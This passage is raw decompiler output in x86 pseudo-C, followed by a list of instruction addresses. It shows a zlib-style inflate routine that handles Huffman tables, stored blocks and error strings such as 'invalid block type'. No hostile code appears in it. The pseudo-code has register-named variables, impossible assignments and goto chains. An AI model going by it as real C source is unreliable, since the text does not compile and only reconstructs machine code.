                                                          								__eax =  *(__esi + 4);
                                                          								__edx = __eax;
                                                          								__eax = __eax & 0x0000001f;
                                                          								__edx = __edx >> 5;
                                                          								__edx = __edx & 0x0000001f;
                                                          								_t254 = __eax + 0x102; // 0x102
                                                          								__eax = __edx + _t254;
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) + __ecx;
                                                          								__eflags =  *(__ebp - 0x10) + __ecx - __eax;
                                                          								if( *(__ebp - 0x10) + __ecx > __eax) {
                                                          									L111:
                                                          									__edi[9](__edi[0xa],  *(__esi + 0xc)) =  *(__ebp + 8);
                                                          									 *__esi = 9;
                                                          									__edi[6] = "invalid bit length repeat";
                                                          									 *(__esi + 0x20) =  *(__ebp + 8);
                                                          									__eax =  *(__ebp + 0xc);
                                                          									 *(__esi + 0x1c) =  *(__ebp + 0xc);
                                                          									__eax =  *(__ebp - 4);
                                                          									__edi[1] =  *(__ebp - 4);
                                                          									__ebx = __ebx -  *__edi;
                                                          									 *__edi = __ebx;
                                                          									__edi[2] = __edi[2] + __ebx -  *__edi;
                                                          									__eax =  *(__ebp - 8);
                                                          									 *(__esi + 0x34) =  *(__ebp - 8);
                                                          									__eax = E00403BD6(__ecx, __esi, __edi, 0xfffffffd);
                                                          									goto L101;
                                                          								}
                                                          								__eflags =  *(__ebp - 0x14) - 0x10;
                                                          								if( *(__ebp - 0x14) != 0x10) {
                                                          									__eax = 0;
                                                          									__eflags = 0;
                                                          									do {
                                                          										L87:
                                                          										__edx =  *(__esi + 0xc);
                                                          										 *( *(__esi + 0xc) + __ecx * 4) = __eax;
                                                          										__ecx = __ecx + 1;
                                                          										_t264 = __ebp - 0x10;
                                                          										 *_t264 =  *(__ebp - 0x10) - 1;
                                                          										__eflags =  *_t264;
                                                          									} while ( *_t264 != 0);
                                                          									 *(__esi + 8) = __ecx;
                                                          									continue;
                                                          								}
                                                          								__eflags = __ecx - 1;
                                                          								if(__ecx < 1) {
                                                          									goto L111;
                                                          								}
                                                          								__eax =  *(__esi + 0xc);
                                                          								__eax =  *( *(__esi + 0xc) + __ecx * 4 - 4);
                                                          								goto L87;
                                                          							}
                                                          							 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
                                                          							__eax = __ecx;
                                                          							__ecx =  *(__esi + 0xc);
                                                          							 *(__ebp + 0xc) =  *(__ebp + 0xc) - __eax;
                                                          							__eax =  *(__esi + 8);
                                                          							 *( *(__esi + 0xc) +  *(__esi + 8) * 4) = __edx;
                                                          							 *(__esi + 8) =  *(__esi + 8) + 1;
                                                          						}
                                                          						__ecx = __ebp - 0x28;
                                                          						__eax =  *(__esi + 4);
                                                          						 *(__esi + 0x14) =  *(__esi + 0x14) & 0x00000000;
                                                          						 *(__ebp - 0x14) = 9;
                                                          						__ebp - 0x2c = __ebp - 0x10;
                                                          						__ecx = __ebp - 0x14;
                                                          						__ecx = __eax;
                                                          						__eax = __eax & 0x0000001f;
                                                          						__ecx = __ecx >> 5;
                                                          						__ecx = __ecx & 0x0000001f;
                                                          						__eax = __eax + 0x101;
                                                          						__ecx = __ecx + 1;
                                                          						 *(__ebp - 0x10) = 6;
                                                          						__eax = E0040501F(__eax, __ecx,  *(__esi + 0xc), __ebp - 0x14, __ebp - 0x10, __ebp - 0x2c, __ebp - 0x28,  *((intOrPtr*)(__esi + 0x24)), __edi);
                                                          						 *(__ebp - 0xc) = __eax;
                                                          						__eflags = __eax;
                                                          						if(__eax != 0) {
                                                          							__eflags =  *(__ebp - 0xc) - 0xfffffffd;
                                                          							L113:
                                                          							if(__eflags == 0) {
                                                          								__eax = __edi[9](__edi[0xa],  *(__esi + 0xc));
                                                          								_pop(__ecx);
                                                          								 *__esi = 9;
                                                          								_pop(__ecx);
                                                          							}
                                                          							__eax =  *(__ebp + 8);
                                                          							_push( *(__ebp - 0xc));
                                                          							 *(__esi + 0x20) =  *(__ebp + 8);
                                                          							__eax =  *(__ebp + 0xc);
                                                          							 *(__esi + 0x1c) =  *(__ebp + 0xc);
                                                          							__eax =  *(__ebp - 4);
                                                          							__edi[1] =  *(__ebp - 4);
                                                          							__ebx = __ebx -  *__edi;
                                                          							 *__edi = __ebx;
                                                          							__edi[2] = __edi[2] + __ebx -  *__edi;
                                                          							__eax =  *(__ebp - 8);
                                                          							 *(__esi + 0x34) =  *(__ebp - 8);
                                                          							goto L100;
                                                          						}
                                                          						__eax = E00403CC8( *(__ebp - 0x14),  *(__ebp - 0x10),  *((intOrPtr*)(__ebp - 0x2c)),  *(__ebp - 0x28), __edi);
                                                          						__eflags = __eax;
                                                          						if(__eax == 0) {
                                                          							L116:
                                                          							_push(0xfffffffc);
                                                          							_t488[8] =  *(_t490 + 8);
                                                          							_t488[7] =  *(_t490 + 0xc);
                                                          							 *(_t485 + 4) =  *(_t490 - 4);
                                                          							 *_t485 = _t476;
                                                          							 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
                                                          							_t488[0xd] =  *(_t490 - 8);
                                                          							goto L100;
                                                          						}
                                                          						 *(__esi + 4) = __eax;
                                                          						__eax = __edi[9](__edi[0xa],  *(__esi + 0xc));
                                                          						_pop(__ecx);
                                                          						 *__esi = 6;
                                                          						_pop(__ecx);
                                                          						goto L92;
                                                          						L58:
                                                          						 *(__esi + 4) =  *(__esi + 4) >> 0xa;
                                                          						__eax = ( *(__esi + 4) >> 0xa) + 4;
                                                          						__eflags =  *(__esi + 8) - ( *(__esi + 4) >> 0xa) + 4;
                                                          						if( *(__esi + 8) >= ( *(__esi + 4) >> 0xa) + 4) {
                                                          							while(1) {
                                                          								L64:
                                                          								__eflags =  *(__esi + 8) - 0x13;
                                                          								if( *(__esi + 8) >= 0x13) {
                                                          									break;
                                                          								}
                                                          								__eax =  *(__esi + 8);
                                                          								__ecx =  *(__esi + 0xc);
                                                          								 *(__ecx +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) =  *( *(__esi + 0xc) +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) & 0x00000000;
                                                          								 *(__esi + 8) =  *(__esi + 8) + 1;
                                                          							}
                                                          							__ecx = __esi + 0x14;
                                                          							__eax = __esi + 0x10;
                                                          							 *(__esi + 0x10) = 7;
                                                          							__eax = E00404FA0( *(__esi + 0xc), __eax, __ecx,  *((intOrPtr*)(__esi + 0x24)), __edi);
                                                          							 *(__ebp - 0xc) = __eax;
                                                          							__eflags = __eax;
                                                          							if(__eax != 0) {
                                                          								__eflags =  *(__ebp - 0xc) - 0xfffffffd;
                                                          								goto L113;
                                                          							}
                                                          							_t182 = __esi + 8;
                                                          							 *_t182 =  *(__esi + 8) & __eax;
                                                          							__eflags =  *_t182;
                                                          							 *__esi = 5;
                                                          							goto L68;
                                                          						} else {
                                                          							goto L59;
                                                          						}
                                                          						do {
                                                          							L59:
                                                          							__ecx =  *(__ebp + 0xc);
                                                          							while(1) {
                                                          								__eflags = __ecx - 3;
                                                          								if(__ecx >= 3) {
                                                          									goto L63;
                                                          								}
                                                          								__eflags =  *(__ebp - 4);
                                                          								if( *(__ebp - 4) == 0) {
                                                          									goto L107;
                                                          								}
                                                          								__eax =  *__ebx & 0x000000ff;
                                                          								 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
                                                          								 *(__ebp - 4) =  *(__ebp - 4) - 1;
                                                          								__eax = ( *__ebx & 0x000000ff) << __cl;
                                                          								 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
                                                          								__ebx = __ebx + 1;
                                                          								__ecx = __ecx + 8;
                                                          								 *(__ebp + 0xc) = __ecx;
                                                          							}
                                                          							L63:
                                                          							__ecx =  *(__esi + 8);
                                                          							__eax =  *(__ebp + 8);
                                                          							__edx =  *(__esi + 0xc);
                                                          							__eax =  *(__ebp + 8) & 0x00000007;
                                                          							__ecx =  *(0x40cdf0 +  *(__esi + 8) * 4);
                                                          							 *(__ebp + 0xc) =  *(__ebp + 0xc) - 3;
                                                          							 *(__ebp + 8) =  *(__ebp + 8) >> 3;
                                                          							 *( *(__esi + 0xc) +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) =  *(__ebp + 8) & 0x00000007;
                                                          							__ecx =  *(__esi + 4);
                                                          							 *(__esi + 8) =  *(__esi + 8) + 1;
                                                          							__eax =  *(__esi + 8);
                                                          							 *(__esi + 4) >> 0xa = ( *(__esi + 4) >> 0xa) + 4;
                                                          							__eflags =  *(__esi + 8) - ( *(__esi + 4) >> 0xa) + 4;
                                                          						} while ( *(__esi + 8) < ( *(__esi + 4) >> 0xa) + 4);
                                                          						goto L64;
                                                          						L50:
                                                          						__ecx =  *(__ebp + 0xc);
                                                          						while(1) {
                                                          							__eflags = __ecx - 0xe;
                                                          							if(__ecx >= 0xe) {
                                                          								break;
                                                          							}
                                                          							__eflags =  *(__ebp - 4);
                                                          							if( *(__ebp - 4) == 0) {
                                                          								goto L107;
                                                          							}
                                                          							__eax =  *__ebx & 0x000000ff;
                                                          							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
                                                          							 *(__ebp - 4) =  *(__ebp - 4) - 1;
                                                          							__eax = ( *__ebx & 0x000000ff) << __cl;
                                                          							 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
                                                          							__ebx = __ebx + 1;
                                                          							__ecx = __ecx + 8;
                                                          							 *(__ebp + 0xc) = __ecx;
                                                          						}
                                                          						__eax =  *(__ebp + 8);
                                                          						__eax =  *(__ebp + 8) & 0x00003fff;
                                                          						__ecx = __eax;
                                                          						 *(__esi + 4) = __eax;
                                                          						__ecx = __eax & 0x0000001f;
                                                          						__eflags = __ecx - 0x1d;
                                                          						if(__ecx > 0x1d) {
                                                          							L109:
                                                          							 *__esi = 9;
                                                          							__edi[6] = "too many length or distance symbols";
                                                          							break;
                                                          						}
                                                          						__eax = __eax & 0x000003e0;
                                                          						__eflags = (__eax & 0x000003e0) - 0x3a0;
                                                          						if((__eax & 0x000003e0) > 0x3a0) {
                                                          							goto L109;
                                                          						}
                                                          						__eax = __eax >> 5;
                                                          						__eax = __eax & 0x0000001f;
                                                          						__eax = __edi[8](__edi[0xa], __eax, 4);
                                                          						__esp = __esp + 0xc;
                                                          						 *(__esi + 0xc) = __eax;
                                                          						__eflags = __eax;
                                                          						if(__eax == 0) {
                                                          							goto L116;
                                                          						}
                                                          						 *(__ebp + 8) =  *(__ebp + 8) >> 0xe;
                                                          						 *(__ebp + 0xc) =  *(__ebp + 0xc) - 0xe;
                                                          						_t138 = __esi + 8;
                                                          						 *_t138 =  *(__esi + 8) & 0x00000000;
                                                          						__eflags =  *_t138;
                                                          						 *__esi = 4;
                                                          						goto L58;
                                                          						L27:
                                                          						__eflags =  *(__ebp - 4);
                                                          						if( *(__ebp - 4) == 0) {
                                                          							goto L107;
                                                          						}
                                                          						__eflags = __ecx;
                                                          						if(__ecx != 0) {
                                                          							L44:
                                                          							__eax =  *(__esi + 4);
                                                          							__ecx =  *(__ebp - 4);
                                                          							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
                                                          							__eflags = __eax - __ecx;
                                                          							 *(__ebp - 0xc) = __eax;
                                                          							if(__eax > __ecx) {
                                                          								 *(__ebp - 0xc) = __ecx;
                                                          							}
                                                          							__eax =  *(__ebp - 0x10);
                                                          							__eflags =  *(__ebp - 0xc) - __eax;
                                                          							if( *(__ebp - 0xc) > __eax) {
                                                          								 *(__ebp - 0xc) = __eax;
                                                          							}
                                                          							__eax = memcpy( *(__ebp - 8), __ebx,  *(__ebp - 0xc));
                                                          							__eax =  *(__ebp - 0xc);
                                                          							__esp = __esp + 0xc;
                                                          							 *(__ebp - 4) =  *(__ebp - 4) - __eax;
                                                          							 *(__ebp - 8) =  *(__ebp - 8) + __eax;
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __eax;
                                                          							__ebx = __ebx + __eax;
                                                          							_t115 = __esi + 4;
                                                          							 *_t115 =  *(__esi + 4) - __eax;
                                                          							__eflags =  *_t115;
                                                          							if( *_t115 == 0) {
                                                          								L49:
                                                          								 *(__esi + 0x18) =  ~( *(__esi + 0x18));
                                                          								asm("sbb eax, eax");
                                                          								__eax =  ~( *(__esi + 0x18)) & 0x00000007;
                                                          								L16:
                                                          								 *_t488 = _t456;
                                                          							}
                                                          							goto L98;
                                                          						}
                                                          						__ecx =  *(__esi + 0x2c);
                                                          						__eflags = __edx - __ecx;
                                                          						if(__edx != __ecx) {
                                                          							L35:
                                                          							__eax =  *(__ebp - 8);
                                                          							 *(__esi + 0x34) =  *(__ebp - 8);
                                                          							__eax = E00403BD6(__ecx, __esi, __edi,  *(__ebp + 0x10));
                                                          							__ecx =  *(__esi + 0x30);
                                                          							 *(__ebp + 0x10) = __eax;
                                                          							__eax =  *(__esi + 0x34);
                                                          							__eflags = __eax - __ecx;
                                                          							 *(__ebp - 8) = __eax;
                                                          							if(__eax >= __ecx) {
                                                          								__edx =  *(__esi + 0x2c);
                                                          								__edx =  *(__esi + 0x2c) -  *(__ebp - 8);
                                                          								__eflags = __edx;
                                                          								 *(__ebp - 0x10) = __edx;
                                                          							} else {
                                                          								__ecx = __ecx -  *(__ebp - 8);
                                                          								__eax = __ecx -  *(__ebp - 8) - 1;
                                                          								 *(__ebp - 0x10) = __ecx -  *(__ebp - 8) - 1;
                                                          							}
                                                          							__edx =  *(__esi + 0x2c);
                                                          							__eflags =  *(__ebp - 8) - __edx;
                                                          							if( *(__ebp - 8) == __edx) {
                                                          								__eax =  *(__esi + 0x28);
                                                          								__eflags = __eax - __ecx;
                                                          								if(__eflags != 0) {
                                                          									 *(__ebp - 8) = __eax;
                                                          									if(__eflags >= 0) {
                                                          										__edx = __edx - __eax;
                                                          										__eflags = __edx;
                                                          										 *(__ebp - 0x10) = __edx;
                                                          									} else {
                                                          										__ecx = __ecx - __eax;
                                                          										__ecx = __ecx - 1;
                                                          										 *(__ebp - 0x10) = __ecx;
                                                          									}
                                                          								}
                                                          							}
                                                          							__eflags =  *(__ebp - 0x10);
                                                          							if( *(__ebp - 0x10) == 0) {
                                                          								__eax =  *(__ebp + 8);
                                                          								 *(__esi + 0x20) =  *(__ebp + 8);
                                                          								__eax =  *(__ebp + 0xc);
                                                          								 *(__esi + 0x1c) =  *(__ebp + 0xc);
                                                          								__eax =  *(__ebp - 4);
                                                          								__edi[1] =  *(__ebp - 4);
                                                          								goto L108;
                                                          							} else {
                                                          								goto L44;
                                                          							}
                                                          						}
                                                          						__eax =  *(__esi + 0x30);
                                                          						__edx =  *(__esi + 0x28);
                                                          						__eflags = __edx - __eax;
                                                          						if(__eflags == 0) {
                                                          							goto L35;
                                                          						}
                                                          						 *(__ebp - 8) = __edx;
                                                          						if(__eflags >= 0) {
                                                          							__ecx = __ecx - __edx;
                                                          							__eflags = __ecx;
                                                          							 *(__ebp - 0x10) = __ecx;
                                                          						} else {
                                                          							__eax = __eax - __edx;
                                                          							 *(__ebp - 0x10) = __eax;
                                                          						}
                                                          						__eflags =  *(__ebp - 0x10);
                                                          						if( *(__ebp - 0x10) != 0) {
                                                          							goto L44;
                                                          						} else {
                                                          							goto L35;
                                                          						}
                                                          						L20:
                                                          						__ecx =  *(__ebp + 0xc);
                                                          						while(1) {
                                                          							__eflags = __ecx - 0x20;
                                                          							if(__ecx >= 0x20) {
                                                          								break;
                                                          							}
                                                          							__eflags =  *(__ebp - 4);
                                                          							if( *(__ebp - 4) == 0) {
                                                          								goto L107;
                                                          							}
                                                          							__eax =  *__ebx & 0x000000ff;
                                                          							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
                                                          							 *(__ebp - 4) =  *(__ebp - 4) - 1;
                                                          							__eax = ( *__ebx & 0x000000ff) << __cl;
                                                          							 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
                                                          							__ebx = __ebx + 1;
                                                          							__ecx = __ecx + 8;
                                                          							 *(__ebp + 0xc) = __ecx;
                                                          						}
                                                          						__ecx =  *(__ebp + 8);
                                                          						__eax =  *(__ebp + 8);
                                                          						__ecx =  !( *(__ebp + 8));
                                                          						__eax =  *(__ebp + 8) & 0x0000ffff;
                                                          						__ecx =  !( *(__ebp + 8)) >> 0x10;
                                                          						__ecx =  !( *(__ebp + 8)) >> 0x00000010 ^ __eax;
                                                          						__eflags = __ecx;
                                                          						if(__ecx != 0) {
                                                          							 *__esi = 9;
                                                          							__edi[6] = "invalid stored block lengths";
                                                          							break;
                                                          						}
                                                          						 *(__esi + 4) = __eax;
                                                          						__eax = 0;
                                                          						__eflags =  *(__esi + 4);
                                                          						 *(__ebp + 0xc) = 0;
                                                          						 *(__ebp + 8) = 0;
                                                          						if( *(__esi + 4) == 0) {
                                                          							goto L49;
                                                          						}
                                                          						__eax = 2;
                                                          						goto L16;
                                                          						L7:
                                                          						while( *(_t490 + 0xc) < 3) {
                                                          							if( *(_t490 - 4) == 0) {
                                                          								goto L107;
                                                          							}
                                                          							_t479 =  *(_t490 + 0xc);
                                                          							 *(_t490 + 0x10) =  *(_t490 + 0x10) & 0x00000000;
                                                          							 *(_t490 - 4) =  *(_t490 - 4) - 1;
                                                          							 *(_t490 + 8) =  *(_t490 + 8) | ( *_t476 & 0x000000ff) <<  *(_t490 + 0xc);
                                                          							_t476 =  &(_t476[1]);
                                                          							 *(_t490 + 0xc) =  *(_t490 + 0xc) + 8;
                                                          						}
                                                          						_t436 =  *(_t490 + 8) & 0x00000007;
                                                          						_t479 = _t436 & 0x00000001;
                                                          						_t438 = _t436 >> 1;
                                                          						__eflags = _t438;
                                                          						_t488[6] = _t436 & 0x00000001;
                                                          						if(_t438 == 0) {
                                                          							 *(_t490 + 0xc) =  *(_t490 + 0xc) - 3;
                                                          							 *_t488 = 1;
                                                          							_t479 =  *(_t490 + 0xc) & 0x00000007;
                                                          							 *(_t490 + 0xc) =  *(_t490 + 0xc) - _t479;
                                                          							 *(_t490 + 8) =  *(_t490 + 8) >> 3 >> _t479;
                                                          							goto L98;
                                                          						}
                                                          						_t442 = _t438 - 1;
                                                          						__eflags = _t442;
                                                          						if(_t442 == 0) {
                                                          							_push(_t485);
                                                          							E00405122(_t490 - 0x24, _t490 - 0x20, _t490 - 0x1c, _t490 - 0x18);
                                                          							_t448 = E00403CC8( *((intOrPtr*)(_t490 - 0x24)),  *((intOrPtr*)(_t490 - 0x20)),  *((intOrPtr*)(_t490 - 0x1c)),  *((intOrPtr*)(_t490 - 0x18)), _t485);
                                                          							_t493 = _t493 + 0x28;
                                                          							_t488[1] = _t448;
                                                          							__eflags = _t448;
                                                          							if(_t448 == 0) {
                                                          								goto L116;
                                                          							}
                                                          							 *(_t490 + 8) =  *(_t490 + 8) >> 3;
                                                          							 *(_t490 + 0xc) =  *(_t490 + 0xc) - 3;
                                                          							 *_t488 = 6;
                                                          							goto L98;
                                                          						}
                                                          						_t455 = _t442 - 1;
                                                          						__eflags = _t455;
                                                          						if(_t455 == 0) {
                                                          							 *(_t490 + 8) =  *(_t490 + 8) >> 3;
                                                          							_t456 = 3;
                                                          							_t33 = _t490 + 0xc;
                                                          							 *_t33 =  *(_t490 + 0xc) - _t456;
                                                          							__eflags =  *_t33;
                                                          							goto L16;
                                                          						}
                                                          						__eflags = _t455 == 1;
                                                          						if(_t455 == 1) {
                                                          							 *_t488 = 9;
                                                          							 *(_t485 + 0x18) = "invalid block type";
                                                          							_t488[8] =  *(_t490 + 8) >> 3;
                                                          							_t461 =  *(_t490 + 0xc) + 0xfffffffd;
                                                          							L105:
                                                          							_t488[7] = _t461;
                                                          							 *(_t485 + 4) =  *(_t490 - 4);
                                                          							 *_t485 = _t476;
                                                          							_push(0xfffffffd);
                                                          							 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
                                                          							_t488[0xd] =  *(_t490 - 8);
                                                          							goto L100;
                                                          						}
                                                          						goto L98;
                                                          					}
                                                          					L104:
                                                          					__eax =  *(__ebp + 8);
                                                          					 *(__esi + 0x20) =  *(__ebp + 8);
                                                          					__eax =  *(__ebp + 0xc);
                                                          					goto L105;
                                                          					L122:
                                                          					__eax =  *(__ebp + 8);
                                                          					_push(1);
                                                          					 *(__esi + 0x20) =  *(__ebp + 8);
                                                          					__eax =  *(__ebp + 0xc);
                                                          					 *(__esi + 0x1c) =  *(__ebp + 0xc);
                                                          					__eax =  *(__ebp - 4);
                                                          					__edi[1] =  *(__ebp - 4);
                                                          					__ebx = __ebx -  *__edi;
                                                          					 *__edi = __ebx;
                                                          					__edi[2] = __edi[2] + __ebx -  *__edi;
                                                          					__eax =  *(__ebp - 8);
                                                          					 *(__esi + 0x34) =  *(__ebp - 8);
                                                          					goto L100;
                                                          					L118:
                                                          					__eax =  *(__ebp - 8);
                                                          					 *(__esi + 0x34) =  *(__ebp - 8);
                                                          					__eax = E00403BD6(__ecx, __esi, __edi,  *(__ebp + 0x10));
                                                          					__ecx =  *(__esi + 0x34);
                                                          					__eflags =  *(__esi + 0x30) - __ecx;
                                                          					 *(__ebp - 8) = __ecx;
                                                          					if( *(__esi + 0x30) == __ecx) {
                                                          						 *__esi = 8;
                                                          						goto L122;
                                                          					}
                                                          					__ecx =  *(__ebp + 8);
                                                          					 *(__esi + 0x20) =  *(__ebp + 8);
                                                          					__ecx =  *(__ebp + 0xc);
                                                          					 *(__esi + 0x1c) =  *(__ebp + 0xc);
                                                          					__ecx =  *(__ebp - 4);
                                                          					__edi[1] =  *(__ebp - 4);
                                                          					__ebx = __ebx -  *__edi;
                                                          					 *__edi = __ebx;
                                                          					_t409 =  &(__edi[2]);
                                                          					 *_t409 = __edi[2] + __ebx -  *__edi;
                                                          					__eflags =  *_t409;
                                                          					__ecx =  *(__ebp - 8);
                                                          					 *(__esi + 0x34) = __ecx;
                                                          					goto L120;
                                                          				}
                                                          			}























                                                          0x004043b7
                                                          0x004043b9
                                                          0x004043be
                                                          0x004043c2
                                                          0x004043c5
                                                          0x004043cb
                                                          0x004043cd
                                                          0x004043d3
                                                          0x004043d9
                                                          0x004043dc
                                                          0x004043e1
                                                          0x004043e4
                                                          0x004043f0
                                                          0x004043f0
                                                          0x004043e6
                                                          0x004043e9
                                                          0x004043e9
                                                          0x004043f2
                                                          0x004043f4
                                                          0x004043fa
                                                          0x004049c2
                                                          0x004049c5
                                                          0x004049c7
                                                          0x004049cd
                                                          0x004049d3
                                                          0x004049da
                                                          0x004049dc
                                                          0x004049dc
                                                          0x004049dc
                                                          0x004049e2
                                                          0x00000000
                                                          0x00404400
                                                          0x00404408
                                                          0x00404408
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404935
                                                          0x00404935
                                                          0x0040493b
                                                          0x0040493e
                                                          0x00404941
                                                          0x00404944
                                                          0x00404947
                                                          0x0040494c
                                                          0x0040494f
                                                          0x00404952
                                                          0x00404955
                                                          0x00404958
                                                          0x0040495b
                                                          0x00404963
                                                          0x00404966
                                                          0x00404b89
                                                          0x00404b89
                                                          0x004049e5
                                                          0x004049e5
                                                          0x004049e6
                                                          0x004049e7
                                                          0x004049ef
                                                          0x004049f3
                                                          0x004049f3
                                                          0x0040496c
                                                          0x00404979
                                                          0x0040497c
                                                          0x0040497e
                                                          0x00404981
                                                          0x00404984
                                                          0x00404985
                                                          0x00404988
                                                          0x0040498b
                                                          0x0040498c
                                                          0x0040498f
                                                          0x00404992
                                                          0x00404995
                                                          0x00404998
                                                          0x0040499a
                                                          0x004049a1
                                                          0x004049a4
                                                          0x004049a4
                                                          0x0040499c
                                                          0x0040499c
                                                          0x0040499e
                                                          0x0040499e
                                                          0x004049a7
                                                          0x004049ab
                                                          0x004049ae
                                                          0x00404b44
                                                          0x00000000
                                                          0x004049b4
                                                          0x004049b4
                                                          0x004049b4
                                                          0x004049b7
                                                          0x004049b7
                                                          0x004049b9
                                                          0x004049bc
                                                          0x00404402
                                                          0x00000000
                                                          0x00404405
                                                          0x00000000
                                                          0x004049bc
                                                          0x0040476e
                                                          0x0040476e
                                                          0x0040476e
                                                          0x00404771
                                                          0x00404774
                                                          0x00404776
                                                          0x00404779
                                                          0x0040477c
                                                          0x0040477f
                                                          0x0040477f
                                                          0x00404786
                                                          0x00404788
                                                          0x00000000
                                                          0x00000000
                                                          0x0040478e
                                                          0x00404791
                                                          0x00404791
                                                          0x00404794
                                                          0x00000000
                                                          0x00000000
                                                          0x00404796
                                                          0x0040479a
                                                          0x00404a58
                                                          0x00404a5b
                                                          0x00404a61
                                                          0x00404a64
                                                          0x00404a64
                                                          0x00404a64
                                                          0x00404a68
                                                          0x00404a6a
                                                          0x00404a6f
                                                          0x00404a71
                                                          0x00404a77
                                                          0x00000000
                                                          0x00404a77
                                                          0x004047a0
                                                          0x004047a3
                                                          0x004047a6
                                                          0x004047aa
                                                          0x004047ad
                                                          0x004047af
                                                          0x004047b2
                                                          0x004047b3
                                                          0x004047b3
                                                          0x004047b9
                                                          0x004047c0
                                                          0x004047c3
                                                          0x004047c6
                                                          0x004047ca
                                                          0x004047cd
                                                          0x004047d0
                                                          0x004047d3
                                                          0x004047d7
                                                          0x004047da
                                                          0x004047f5
                                                          0x004047f8
                                                          0x004047ff
                                                          0x004047ff
                                                          0x004047fa
                                                          0x004047fc
                                                          0x004047fc
                                                          0x00404802
                                                          0x00404804
                                                          0x0040480a
                                                          0x0040480b
                                                          0x0040480e
                                                          0x0040480e
                                                          0x00404811
                                                          0x00404814
                                                          0x00404814
                                                          0x00404817
                                                          0x0040481a
                                                          0x0040481d
                                                          0x00000000
                                                          0x00000000
                                                          0x0040481f
                                                          0x00404823
                                                          0x00000000
                                                          0x00000000
                                                          0x00404829
                                                          0x0040482c
                                                          0x0040482f
                                                          0x00404833
                                                          0x00404836
                                                          0x00404838
                                                          0x0040483b
                                                          0x0040483c
                                                          0x0040483c
                                                          0x00404842
                                                          0x0040484c
                                                          0x0040484f
                                                          0x00404852
                                                          0x00404854
                                                          0x00404857
                                                          0x0040485a
                                                          0x0040485c
                                                          0x0040485f
                                                          0x00404862
                                                          0x00404865
                                                          0x00404867
                                                          0x0040486a
                                                          0x0040486d
                                                          0x00404870
                                                          0x00404870
                                                          0x0040487a
                                                          0x0040487c
                                                          0x0040487e
                                                          0x00404a94
                                                          0x00404a9d
                                                          0x00404aa0
                                                          0x00404aa6
                                                          0x00404aad
                                                          0x00404ab0
                                                          0x00404ab5
                                                          0x00404ab8
                                                          0x00404abb
                                                          0x00404ac0
                                                          0x00404ac3
                                                          0x00404ac6
                                                          0x00404ac9
                                                          0x00404acc
                                                          0x00404acf
                                                          0x00000000
                                                          0x00404ad4
                                                          0x00404884
                                                          0x00404888
                                                          0x0040489c
                                                          0x0040489c
                                                          0x0040489e
                                                          0x0040489e
                                                          0x0040489e
                                                          0x004048a1
                                                          0x004048a4
                                                          0x004048a5
                                                          0x004048a5
                                                          0x004048a5
                                                          0x004048a5
                                                          0x004048aa
                                                          0x00000000
                                                          0x004048aa
                                                          0x0040488a
                                                          0x0040488d
                                                          0x00000000
                                                          0x00000000
                                                          0x00404893
                                                          0x00404896
                                                          0x00000000
                                                          0x00404896
                                                          0x004047dc
                                                          0x004047df
                                                          0x004047e1
                                                          0x004047e4
                                                          0x004047e7
                                                          0x004047ea
                                                          0x004047ed
                                                          0x004047ed
                                                          0x004048b3
                                                          0x004048b9
                                                          0x004048bc
                                                          0x004048c0
                                                          0x004048cc
                                                          0x004048d0
                                                          0x004048d4
                                                          0x004048d9
                                                          0x004048dc
                                                          0x004048df
                                                          0x004048e2
                                                          0x004048e7
                                                          0x004048e8
                                                          0x004048f1
                                                          0x004048f9
                                                          0x004048fc
                                                          0x004048fe
                                                          0x00404adc
                                                          0x00404ae0
                                                          0x00404ae0
                                                          0x00404ae8
                                                          0x00404aeb
                                                          0x00404aec
                                                          0x00404af2
                                                          0x00404af2
                                                          0x00404af3
                                                          0x00404af6
                                                          0x00404af9
                                                          0x00404afc
                                                          0x00404aff
                                                          0x00404b02
                                                          0x00404b05
                                                          0x00404b0a
                                                          0x00404b0c
                                                          0x00404b0e
                                                          0x00404b11
                                                          0x00404b14
                                                          0x00000000
                                                          0x00404b14
                                                          0x00404911
                                                          0x00404919
                                                          0x0040491b
                                                          0x00404b1c
                                                          0x00404b1f
                                                          0x00404b21
                                                          0x00404b27
                                                          0x00404b2d
                                                          0x00404b34
                                                          0x00404b36
                                                          0x00404b3c
                                                          0x00000000
                                                          0x00404b3c
                                                          0x00404924
                                                          0x0040492a
                                                          0x0040492d
                                                          0x0040492e
                                                          0x00404934
                                                          0x00000000
                                                          0x004046b8
                                                          0x004046bb
                                                          0x004046be
                                                          0x004046c1
                                                          0x004046c4
                                                          0x00404721
                                                          0x00404721
                                                          0x00404721
                                                          0x00404725
                                                          0x00000000
                                                          0x00000000
                                                          0x00404727
                                                          0x0040472a
                                                          0x00404734
                                                          0x00404738
                                                          0x00404738
                                                          0x0040473e
                                                          0x00404744
                                                          0x0040474c
                                                          0x00404752
                                                          0x0040475a
                                                          0x0040475d
                                                          0x0040475f
                                                          0x00404a8e
                                                          0x00000000
                                                          0x00404a8e
                                                          0x00404765
                                                          0x00404765
                                                          0x00404765
                                                          0x00404768
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004046c6
                                                          0x004046c6
                                                          0x004046c6
                                                          0x004046c9
                                                          0x004046c9
                                                          0x004046cc
                                                          0x00000000
